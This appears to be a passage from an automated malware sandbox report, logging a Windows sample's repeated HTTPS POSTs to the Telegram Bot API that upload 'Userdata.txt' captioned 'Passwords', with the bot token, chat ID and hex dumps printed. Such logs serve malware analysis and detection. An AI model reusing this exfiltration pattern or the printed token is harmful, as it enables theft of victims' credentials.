                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 544
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:33 UTC544INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43529,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536233,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.849842149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:34 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd31f23425ef07
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 19:10:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 32 33 34 32 35 65 66 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd31f23425ef07Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:35 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:35 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:35 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43530,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536235,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.849863149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:37 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32148015fb2f
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 34 38 30 31 35 66 62 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32148015fb2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:38 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:37 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:38 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43531,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536237,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.849873149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:39 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd322bba2a7429
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 62 62 61 32 61 37 34 32 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd322bba2a7429Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:39 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:39 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:39 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43532,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536239,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.849893149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:42 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd324c62a360f6
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 63 36 32 61 33 36 30 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd324c62a360f6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:42 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:42 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:42 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43533,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536242,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.849906149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:44 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd325f5cb5c2ed
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 66 35 63 62 35 63 32 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd325f5cb5c2edContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:44 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:44 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:44 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43534,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536244,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.849956149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:51 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32b9716ee95a
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 19:10:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 39 37 31 36 65 65 39 35 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32b9716ee95aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:52 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:52 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:52 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43535,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536252,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.849978149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:54 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32debd1abcef
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 65 62 64 31 61 62 63 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32debd1abcefContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:55 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:55 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
